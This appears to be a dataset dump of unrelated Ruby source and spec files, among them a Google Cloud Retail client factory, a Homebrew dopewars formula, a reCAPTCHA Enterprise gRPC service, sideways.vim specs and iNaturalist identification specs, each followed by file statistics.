# Service for managing catalog configuration.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [CatalogService::Client] A client object for the specified version.
#
def self.catalog_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:CatalogService).const_get(:Client).new(&block)
end
##
# Create a new client object for PredictionService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::PredictionService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/PredictionService/Client.html)
# for version V2 of the API.
      # However, you can specify a different API version by passing it in the
# `version` parameter. If the PredictionService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About PredictionService
#
      # Service for making recommendation predictions.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [PredictionService::Client] A client object for the specified version.
#
def self.prediction_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:PredictionService).const_get(:Client).new(&block)
end
##
# Create a new client object for ProductService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::ProductService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/ProductService/Client.html)
# for version V2 of the API.
      # However, you can specify a different API version by passing it in the
# `version` parameter. If the ProductService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About ProductService
#
# Service for ingesting Product information
# of the customer's website.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [ProductService::Client] A client object for the specified version.
#
def self.product_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:ProductService).const_get(:Client).new(&block)
end
##
# Create a new client object for UserEventService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::UserEventService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/UserEventService/Client.html)
# for version V2 of the API.
      # However, you can specify a different API version by passing it in the
# `version` parameter. If the UserEventService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About UserEventService
#
# Service for ingesting end user actions on the customer website.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [UserEventService::Client] A client object for the specified version.
#
def self.user_event_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:UserEventService).const_get(:Client).new(&block)
end
##
# Configure the google-cloud-retail library.
#
# The following configuration parameters are supported:
#
# * `credentials` (*type:* `String, Hash, Google::Auth::Credentials`) -
# The path to the keyfile as a String, the contents of the keyfile as a
# Hash, or a Google::Auth::Credentials object.
# * `lib_name` (*type:* `String`) -
# The library name as recorded in instrumentation and logging.
# * `lib_version` (*type:* `String`) -
# The library version as recorded in instrumentation and logging.
# * `interceptors` (*type:* `Array<GRPC::ClientInterceptor>`) -
# An array of interceptors that are run before calls are executed.
# * `timeout` (*type:* `Numeric`) -
# Default timeout in seconds.
# * `metadata` (*type:* `Hash{Symbol=>String}`) -
# Additional gRPC headers to be sent with the call.
# * `retry_policy` (*type:* `Hash`) -
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) -
# The error codes that should trigger a retry.
#
# @return [::Google::Cloud::Config] The default configuration used by this library
#
def self.configure
yield ::Google::Cloud.configure.retail if block_given?
::Google::Cloud.configure.retail
end
end
end
end
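# Usage sketch (mirrors the factory methods defined above; credentials are
# resolved through the :retail configuration block at the top of this file):
#
#   Google::Cloud::Retail.configure { |config| config.timeout = 10.0 }
#   catalog_client = Google::Cloud::Retail.catalog_service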
helper_path = ::File.join __dir__, "retail", "helpers.rb"
require "google/cloud/retail/helpers" if ::File.file? helper_path
| 45.589372 | 174 | 0.653915 |
39b63242890d1e54578c9aa07f37eac20bf2268a | 621 | require_relative '../automated_init'
context "Put" do
context "Returns stream position" do
stream_name = Controls::StreamName.example
write_event_1 = Controls::EventData::Write.example
write_event_2 = Controls::EventData::Write.example
position_1 = EventSource::EventStore::HTTP::Put.(write_event_1, stream_name)
position_2 = EventSource::EventStore::HTTP::Put.(write_event_2, stream_name)
test "First write returns position of first event" do
assert position_1 == 0
end
test "Subsequent write returns position of next event" do
assert position_2 == 1
end
end
end
| 28.227273 | 80 | 0.727858 |
e87f6b6ccf5076b32a93577c94453ae2932139da | 516 | # frozen_string_literal: false
FactoryBot.define do
factory :debt_account, class: 'Account' do
user
balance { 3000 }
account_type { 'debt' }
balance_currency { 'CLP' }
quota { 0 }
end
factory :credit_account, class: 'Account' do
user
balance { -500 }
account_type { 'credit' }
balance_currency { 'CLP' }
quota { -1000 }
end
factory :account do
user
balance { 3000 }
account_type { 'common' }
balance_currency { 'CLP' }
quota { 200 }
end
end
| 18.428571 | 46 | 0.612403 |
bb65e2242e732140eb434d726f7cb49691b0ca55 | 234 | class Schedule < ApplicationRecord
has_many :user_schedules
has_many :users, through: :user_schedules
has_many :workout_schedules
has_many :workouts,through: :workout_schedules
accepts_nested_attributes_for :workouts
end
| 21.272727 | 48 | 0.816239 |
7ab152a9eac68d19803c095822118e4e242fb616 | 1,499 | # frozen_string_literal: true
module EE
module Mutations
module Boards
module Lists
module Create
extend ActiveSupport::Concern
extend ::Gitlab::Utils::Override
prepended do
argument :milestone_id, ::Types::GlobalIDType[::Milestone],
required: false,
description: 'Global ID of an existing milestone.'
argument :iteration_id, ::Types::GlobalIDType[::Iteration],
required: false,
description: 'Global ID of an existing iteration.'
argument :assignee_id, ::Types::GlobalIDType[::User],
required: false,
description: 'Global ID of an existing user.'
end
private
override :create_list_params
def create_list_params(args)
params = super
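            # `&&=` leaves absent IDs untouched and converts present
            # GlobalIDs into bare model IDs.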
params[:milestone_id] &&= ::GitlabSchema.parse_gid(params[:milestone_id], expected_type: ::Milestone).model_id
params[:iteration_id] &&= ::GitlabSchema.parse_gid(params[:iteration_id], expected_type: ::Iteration).model_id
params[:assignee_id] &&= ::GitlabSchema.parse_gid(params[:assignee_id], expected_type: ::User).model_id
params
end
override :mutually_exclusive_args
def mutually_exclusive_args
super + [:milestone_id, :iteration_id, :assignee_id]
end
end
end
end
end
end
| 33.311111 | 122 | 0.587725 |
3893bd3a325324e37287bb093667f1b1a67d0629 | 3,470 | require 'spec_helper'
describe "regression tests" do
describe "python" do
let(:filename) { 'test.py' }
specify "brackets inside parentheses" do
# See https://github.com/AndrewRadev/sideways.vim/issues/4
set_file_contents <<-EOF
foo([ 'bar', 'baz', 'quux' ])
EOF
vim.search('baz')
vim.left
assert_file_contents <<-EOF
foo([ 'baz', 'bar', 'quux' ])
EOF
end
end
describe "java" do
let(:filename) { 'test.java' }
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "unbalanced brackets in strings" do
set_file_contents <<-EOF
Debug.Log(string.Format("1) Item: {0}"), item);
EOF
vim.search('item')
vim.right
assert_file_contents <<-EOF
Debug.Log(item, string.Format("1) Item: {0}"));
EOF
end
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "escaped quotes" do
set_file_contents <<-EOF
Debug.Log(string.Format("1\\" Item: {0}"), item);
EOF
vim.search('item')
vim.right
assert_file_contents <<-EOF
Debug.Log(item, string.Format("1\\" Item: {0}"));
EOF
end
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "empty quotes" do
set_file_contents <<-EOF
Debug.Log(
"",
one,
two);
return "";
EOF
vim.search('one')
vim.left
assert_file_contents <<-EOF
Debug.Log(
one,
"",
two);
return "";
EOF
end
end
describe "coffee" do
let(:filename) { 'test.coffee' }
specify "nested curly brackets" do
set_file_contents <<-EOF
foo = { one: two, three: { four: five } }
EOF
vim.search('three')
vim.left
assert_file_contents <<-EOF
foo = { three: { four: five }, one: two }
EOF
end
end
describe "ruby" do
let(:filename) { 'test.rb' }
specify "default arguments" do
set_file_contents <<-EOF
def initialize(attributes = {}, options = {})
EOF
vim.search('options')
vim.left
assert_file_contents <<-EOF
def initialize(options = {}, attributes = {})
EOF
end
specify "delimiters on next line" do
set_file_contents <<-EOF
foo = [ one
, two
, three
]
EOF
vim.search('two')
vim.left
assert_file_contents <<-EOF
foo = [ two
, one
, three
]
EOF
end
end
describe "javascript" do
let(:filename) { 'test.js' }
# See https://github.com/AndrewRadev/sideways.vim/issues/31
specify "empty () after opening (" do
set_file_contents <<-EOF
foo(() => { bar(baz); }, qwe);
EOF
vim.search('qwe')
vim.left
assert_file_contents <<-EOF
foo(qwe, () => { bar(baz); });
EOF
end
end
describe "html" do
let(:filename) { 'test.html' }
# See https://github.com/AndrewRadev/sideways.vim/issues/39
specify "no leading whitespace, first item is the last char of the start pattern" do
set_file_contents <<-EOF
<form
id="formid"
name="myform">
EOF
vim.search('id=')
vim.left
assert_file_contents <<-EOF
<form
name="myform"
id="formid">
EOF
end
end
end
| 20.532544 | 88 | 0.538905 |
87b339f57388be51d515b3aa0c08bb3acc03cb70 | 85 | json.array! @confirmations, partial: 'confirmations/confirmation', as: :confirmation
| 42.5 | 84 | 0.8 |
6233eefe5d6e48574bcff8d628d17763b1573377 | 790 | require('pry')
class Scene < ActiveRecord::Base
belongs_to(:quest)
has_many(:observations)
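  # Scenes whose previous_scene points at this scene, i.e. its direct children.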
define_method(:options) do
options = []
Scene.all.each do |scene|
if scene.previous_scene == self.id
options.push(scene)
end
end
options
end
define_method(:required_observations?) do
required = []
observations.each do |observation|
if observation.required == true
required.push(observation.id)
end
end
required
end
define_method(:render_menu) do
s = ''
self.options.each do |option|
s << '<li><a href="/' + self.quest.user_id.to_s + '/scenes/' + option.id.to_s + '/edit">' + option.name + '</a></li>'
s << '<ul>'
s << (option.render_menu())
s << '</ul>'
end
s
end
end
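# A minimal usage sketch (assumes persisted scenes whose previous_scene column
# holds the parent scene's id, and that each quest has a user_id):
#
#   scene = Scene.find(1)   # any saved scene
#   scene.options           # => scenes that branch off it
#   scene.render_menu       # => nested "<li>...<ul>...</ul>" HTML string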
| 21.351351 | 123 | 0.588608 |
f81f7a91e53a47da2638c0e5fb5e9377cc48bd79 | 387 | cask 'sleepyhead' do
version '1.0.0-beta-2.2,20160421'
sha256 '182b818143815b4da5e02260e35832afc9787610a9fb5aba07b309923f01b54b'
url "https://sleepyhead.jedimark.net/releases/SleepyHead-#{version.before_comma}-Snapshot-MacOSX-#{version.after_comma}.dmg"
name 'SleepyHead OpenSource CPAP Review Software'
homepage 'https://sleepyhead.jedimark.net/'
app 'SleepyHead.app'
end
| 35.181818 | 126 | 0.790698 |
7908a586cc2a798014123b667d2ec4ee1cf2a28a | 827 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "/"
css_dir = "css"
sass_dir = "css/scss"
images_dir = "img"
javascripts_dir = "js"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.458333 | 96 | 0.753325 |
d5821f5ae1a999b68e6d946cf834faa552190e89 | 2,160 | # -*- encoding: utf-8 -*-
# stub: commonmarker 0.17.13 ruby lib ext
# stub: ext/commonmarker/extconf.rb
Gem::Specification.new do |s|
s.name = "commonmarker".freeze
s.version = "0.17.13"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze, "ext".freeze]
s.authors = ["Garen Torikian".freeze, "Ashe Connor".freeze]
s.date = "2018-09-10"
s.description = "A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.".freeze
s.executables = ["commonmarker".freeze]
s.extensions = ["ext/commonmarker/extconf.rb".freeze]
s.files = ["bin/commonmarker".freeze, "ext/commonmarker/extconf.rb".freeze]
s.homepage = "http://github.com/gjtorikian/commonmarker".freeze
s.licenses = ["MIT".freeze]
s.rdoc_options = ["-x".freeze, "ext/commonmarker/cmark/.*".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
s.rubygems_version = "3.2.20".freeze
s.summary = "CommonMark parser and renderer. Written in C, wrapped in Ruby.".freeze
s.installed_by_version = "3.2.20" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_development_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_development_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_development_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_development_dependency(%q<rdoc>.freeze, ["~> 5.1"])
else
s.add_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_dependency(%q<rdoc>.freeze, ["~> 5.1"])
end
end
| 45 | 116 | 0.683333 |
7a51915a7ae9d30416a1c0c27101813f4a33566c | 2,864 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# Source: google/cloud/recaptchaenterprise/v1/recaptchaenterprise.proto for package 'Google.Cloud.RecaptchaEnterprise.V1'
# Original file comments:
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'grpc'
require 'google/cloud/recaptchaenterprise/v1/recaptchaenterprise_pb'
module Google
module Cloud
module RecaptchaEnterprise
module V1
module RecaptchaEnterpriseService
# Service to determine the likelihood an event is legitimate.
class Service
include GRPC::GenericService
self.marshal_class_method = :encode
self.unmarshal_class_method = :decode
self.service_name = 'google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService'
# Creates an Assessment of the likelihood an event is legitimate.
rpc :CreateAssessment, Google::Cloud::RecaptchaEnterprise::V1::CreateAssessmentRequest, Google::Cloud::RecaptchaEnterprise::V1::Assessment
# Annotates a previously created Assessment to provide additional information
            # on whether the event turned out to be authentic or fraudulent.
rpc :AnnotateAssessment, Google::Cloud::RecaptchaEnterprise::V1::AnnotateAssessmentRequest, Google::Cloud::RecaptchaEnterprise::V1::AnnotateAssessmentResponse
# Creates a new reCAPTCHA Enterprise key.
rpc :CreateKey, Google::Cloud::RecaptchaEnterprise::V1::CreateKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Returns the list of all keys that belong to a project.
rpc :ListKeys, Google::Cloud::RecaptchaEnterprise::V1::ListKeysRequest, Google::Cloud::RecaptchaEnterprise::V1::ListKeysResponse
# Returns the specified key.
rpc :GetKey, Google::Cloud::RecaptchaEnterprise::V1::GetKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Updates the specified key.
rpc :UpdateKey, Google::Cloud::RecaptchaEnterprise::V1::UpdateKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Deletes the specified key.
rpc :DeleteKey, Google::Cloud::RecaptchaEnterprise::V1::DeleteKeyRequest, Google::Protobuf::Empty
end
Stub = Service.rpc_stub_class
end
end
end
end
end
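# A minimal client sketch (assumes network access, valid credentials, and a
# real project id; "my-project" below is a placeholder):
#
#   stub = Google::Cloud::RecaptchaEnterprise::V1::RecaptchaEnterpriseService::Stub.new(
#     "recaptchaenterprise.googleapis.com:443",
#     GRPC::Core::ChannelCredentials.new
#   )
#   request = Google::Cloud::RecaptchaEnterprise::V1::CreateAssessmentRequest.new(
#     parent: "projects/my-project"
#   )
#   assessment = stub.create_assessment(request)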
| 48.542373 | 170 | 0.719623 |
1c99c96970d91f983a79934f25da26760c39959c | 833 | #!/usr/bin/env ruby
require_relative './../spec/spec_helper'
class Base
include ROXML
xml_convention :dasherize
xml_namespace 'aws'
end
class WeatherObservation < Base
xml_name 'ob'
xml_reader :temperature, :as => Float, :from => 'aws:temp'
xml_reader :feels_like, :as => Integer
xml_reader :current_condition #, :attributes => {:icon => String} # pending
end
class Weather < Base
xml_reader :observation, :as => WeatherObservation, :required => true
end
unless defined?(RSpec)
current_weather = Weather.from_xml(xml_for('current_weather')).observation
puts "temperature: #{current_weather.temperature}"
puts "feels_like: #{current_weather.feels_like}"
puts "current_condition: #{current_weather.current_condition}"
# puts "current_condition.icon: #{current_weather.current_condition.icon}" # pending
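  # The XML parsed above would look roughly like this (a sketch; the
  # dasherized, aws-namespaced element names follow from the class macros):
  #
  #   <aws:weather xmlns:aws="...">
  #     <aws:ob>
  #       <aws:temp>51.8</aws:temp>
  #       <aws:feels-like>51</aws:feels-like>
  #       <aws:current-condition>Overcast</aws:current-condition>
  #     </aws:ob>
  #   </aws:weather>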
end
| 30.851852 | 85 | 0.751501 |
038dd149460d8a56d6154ab9fc9055bb4fbab547 | 1,622 | class Dopewars < Formula
desc 'Free rewrite of a game originally based on "Drug Wars"'
homepage "https://dopewars.sourceforge.io"
url "https://downloads.sourceforge.net/project/dopewars/dopewars/1.6.1/dopewars-1.6.1.tar.gz"
sha256 "83127903a61d81cda251a022f9df150d11e27bdd040e858c09c57927cc0edea6"
license "GPL-2.0-or-later"
bottle do
sha256 arm64_big_sur: "490e166c6e7a12f93f51271b80aca3d3e6471089e51f77ba30db1ebce1861dcd"
sha256 big_sur: "390ce7a719041ebf745d790ea872db927cb587cfc91ddab183472fe2ceecec43"
sha256 catalina: "85d6516b31e2bd45f92d2e2c18f773ec2b2990b25da82155454274e8c65eaa3d"
sha256 mojave: "abe0910c15903b12be25d3b00f4544f39d10b894c5b773468b7b52e3c403893b"
sha256 x86_64_linux: "97c20d070dace0f2718d7d3bd7e7e36624b9cdbfea8a553ce4bce26cffcf261d"
end
depends_on "pkg-config" => :build
depends_on "glib"
uses_from_macos "curl"
def install
inreplace "src/Makefile.in", "$(dopewars_DEPENDENCIES)", ""
inreplace "auxbuild/ltmain.sh", "need_relink=yes", "need_relink=no"
inreplace "src/plugins/Makefile.in", "LIBADD =", "LIBADD = -module -avoid-version"
system "./configure", "--disable-gui-client",
"--disable-gui-server",
"--enable-plugins",
"--enable-networking",
"--prefix=#{prefix}",
"--mandir=#{man}",
"--disable-debug",
"--disable-dependency-tracking"
system "make", "install"
end
test do
system "#{bin}/dopewars", "-v"
end
end
| 40.55 | 95 | 0.662762 |
39ea2a43348c244d90bd88f5d60b8785cb77c0cc | 1,956 | # frozen_string_literal: true
RSpec.describe Operations::And do
subject(:operation) { Operations::And.new(left, right) }
include_context 'predicates'
let(:left) { Rule::Predicate.build(int?) }
let(:right) { Rule::Predicate.build(gt?).curry(18) }
describe '#call' do
it 'calls left and right' do
expect(operation.(18)).to be_failure
end
end
describe '#to_ast' do
it 'returns ast' do
expect(operation.to_ast).to eql(
[:and, [[:predicate, [:int?, [[:input, Undefined]]]], [:predicate, [:gt?, [[:num, 18], [:input, Undefined]]]]]]
)
end
it 'returns result ast' do
expect(operation.('18').to_ast).to eql(
[:and, [[:predicate, [:int?, [[:input, '18']]]], [:hint, [:predicate, [:gt?, [[:num, 18], [:input, '18']]]]]]]
)
expect(operation.with(hints: false).('18').to_ast).to eql(
[:predicate, [:int?, [[:input, '18']]]]
)
expect(operation.(18).to_ast).to eql(
[:predicate, [:gt?, [[:num, 18], [:input, 18]]]]
)
end
it 'returns failure result ast' do
expect(operation.with(id: :age).('18').to_ast).to eql(
[:failure, [:age, [:and, [[:predicate, [:int?, [[:input, '18']]]], [:hint, [:predicate, [:gt?, [[:num, 18], [:input, '18']]]]]]]]]
)
expect(operation.with(id: :age).(18).to_ast).to eql(
[:failure, [:age, [:predicate, [:gt?, [[:num, 18], [:input, 18]]]]]]
)
end
end
describe '#and' do
let(:other) { Rule::Predicate.build(lt?).curry(30) }
it 'creates and with the other' do
expect(operation.and(other).(31)).to be_failure
end
end
describe '#or' do
let(:other) { Rule::Predicate.build(lt?).curry(14) }
it 'creates or with the other' do
expect(operation.or(other).(13)).to be_success
end
end
describe '#to_s' do
it 'returns string representation' do
expect(operation.to_s).to eql('int? AND gt?(18)')
end
end
end
| 27.549296 | 138 | 0.562372 |
11028d95cb8f973d903f31da300597b7fa1e7ccc | 1,576 | module RsvpTemplatesHelper
  # Pixel widths for the Name, Prompt, Yes Prompt, No Prompt, and Action columns.
  def col_widths
    [75, 150, 150, 150, 75]
  end
def span_wrap_header(text, col)
width = col_widths[col]
"<span style='display: inline-block; width: #{width}px; font-size: 10px; font-weight: bold;'>#{text}</span>"
end
def span_wrap_row(text, col)
width = col_widths[col]
"<span style='display: inline-block; width: #{width}px; font-size: 10px;'>#{text}</span>"
end
def dump_table_headers
table_headers = %w(Name Prompt Yes\ Prompt No\ Prompt Action)
hdr = table_headers.each_with_index.map {|item, index| span_wrap_header(item, index)}.join
"<span style='display: inline-block; width:15px;'> </span>#{hdr}"
end
def row_action(template)
edit = link_to "EDIT", edit_rsvp_template_path(template)
delete = link_to "DELETE", rsvp_template_path(template), :method => :delete
"#{edit} | #{delete}"
end
def dump_table_row(template)
handle = "<span class=sort_handle><img class=sort_handle src='/images/handle.png'></span> "
row = span_wrap_row(template.name, 0) +
span_wrap_row(template.prompt, 1) +
span_wrap_row(template.yes_prompt, 2) +
span_wrap_row(template.no_prompt, 3) +
span_wrap_row(row_action(template), 4)
"<li class='rsvpLi' id='template_#{template.id}'>#{handle}#{row}</li>"
end
def dump_table_rows
rows = @templates.map {|x| dump_table_row(x)}.join('')
"<div id='sortable_templates'>#{rows}</div>"
end
def template_output
"#{dump_table_headers}<br/>#{dump_table_rows}"
end
end
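# In a view this helper's markup would typically be emitted unescaped
# (a sketch; assumes the helper is mixed into the view context):
#
#   <%= raw template_output %>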
| 32.163265 | 112 | 0.658629 |
b93abeaaa388e639562bb451ee178d804b65524a | 47,432 | require "spec_helper"
describe Identification, "creation" do
describe "without callbacks" do
it "should store the previous observation taxon" do
o = make_research_grade_observation
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should not create a blank preference when vision is nil" do
i = Identification.make!( vision: nil )
expect( i.stored_preferences ).to be_blank
end
describe "with an inactive taxon" do
it "should replace the taxon with its active equivalent" do
taxon_change = make_taxon_swap
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.output_taxon
end
it "should not replace the taxon if there is no active equivalent" do
inactive_taxon = Taxon.make!( is_active: false )
expect( Identification.make!( taxon: inactive_taxon ).taxon ).to eq inactive_taxon
end
it "should not replace the taxon if there are multiple active equivalents" do
taxon_change = make_taxon_split
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.input_taxon
end
end
end
describe "with callbacks" do
it "should make older identifications not current" do
old_ident = Identification.make!
new_ident = Identification.make!( observation: old_ident.observation, user: old_ident.user )
expect( new_ident ).to be_valid
expect( new_ident ).to be_current
old_ident.reload
expect( old_ident ).not_to be_current
end
it "should not allow 2 current observations per user" do
ident1 = Identification.make!
ident2 = Identification.make!( user: ident1.user, observation: ident1.observation )
ident1.reload
ident2.reload
expect( ident1 ).not_to be_current
expect( ident2 ).to be_current
ident1.update_attributes( current: true )
ident1.reload
ident2.reload
expect( ident1 ).to be_current
expect( ident2 ).not_to be_current
end
it "should add a taxon to its observation if it's the observer's identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
identification = Identification.make!(:user => obs.user, :observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
end
it "should add a taxon to its observation if it's someone elses identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
expect(obs.community_taxon).to be_blank
end
it "shouldn't add a taxon to its observation if it's someone elses identification but the observation user rejects community IDs" do
u = User.make!(:prefers_community_taxa => false)
obs = Observation.make!(:user => u)
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
end
it "shouldn't create an ID by the obs owner if someone else adds an ID" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.identifications.count).to eq 0
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).not_to be_blank
expect(obs.identifications.count).to eq 1
end
it "should not modify species_guess to an observation if there's a taxon_id and the taxon_id didn't change" do
obs = Observation.make!
taxon = Taxon.make!
taxon2 = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
user = User.make!
identification = Identification.make!(
:user => user,
:observation => obs,
:taxon => taxon2
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add a species_guess to a newly identified observation if the owner identified it and the species_guess was nil" do
obs = Observation.make!
taxon = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add an iconic_taxon_id to its observation if it's the observer's identification" do
obs = Observation.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs
)
obs.reload
expect(obs.iconic_taxon_id).to eq identification.taxon.iconic_taxon_id
end
it "should increment the observations num_identification_agreements if this is an agreement" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_count = obs.num_identification_agreements
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_count+1
end
it "should increment the observation's num_identification_agreements if this is an agreement and there are outdated idents" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_ident = Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq(1)
obs.reload
Identification.make!(:observation => obs, :user => old_ident.user)
obs.reload
expect(obs.num_identification_agreements).to eq(0)
end
it "should increment the observations num_identification_disagreements if this is a disagreement" do
obs = Observation.make!(:taxon => Taxon.make!)
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count+1
end
it "should NOT increment the observations num_identification_disagreements if the obs has no taxon" do
obs = Observation.make!
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count
end
it "should NOT increment the observations num_identification_agreements or num_identification_disagreements if theres just one ID" do
taxon = Taxon.make!
obs = Observation.make!
old_agreement_count = obs.num_identification_agreements
old_disagreement_count = obs.num_identification_disagreements
expect(obs.community_taxon).to be_blank
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_agreement_count
expect(obs.num_identification_disagreements).to eq old_disagreement_count
expect(obs.community_taxon).to be_blank
expect(obs.identifications.count).to eq 1
end
it "should consider an identification with a taxon that is a child of " +
"the observation's taxon to be in agreement" do
taxon = Taxon.make!(rank: Taxon::SPECIES)
parent = Taxon.make!(rank: Taxon::GENUS)
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => parent, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => taxon)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be true
end
it "should not consider an identification with a taxon that is a parent " +
"of the observation's taxon to be in agreement" do
taxon = Taxon.make!
parent = Taxon.make!
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => taxon, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => parent)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be false
end
it "should not consider identifications of different taxa in the different lineages to be in agreement" do
taxon = Taxon.make!( rank: Taxon::GENUS )
child = Taxon.make!( parent: taxon, rank: Taxon::SPECIES)
o = Observation.make!(:prefers_community_taxon => false)
ident = Identification.make!(:taxon => child, :observation => o)
disagreement = Identification.make!(:observation => o, :taxon => taxon)
expect(disagreement.is_agreement?).to be false
end
it "should update observation quality_grade" do
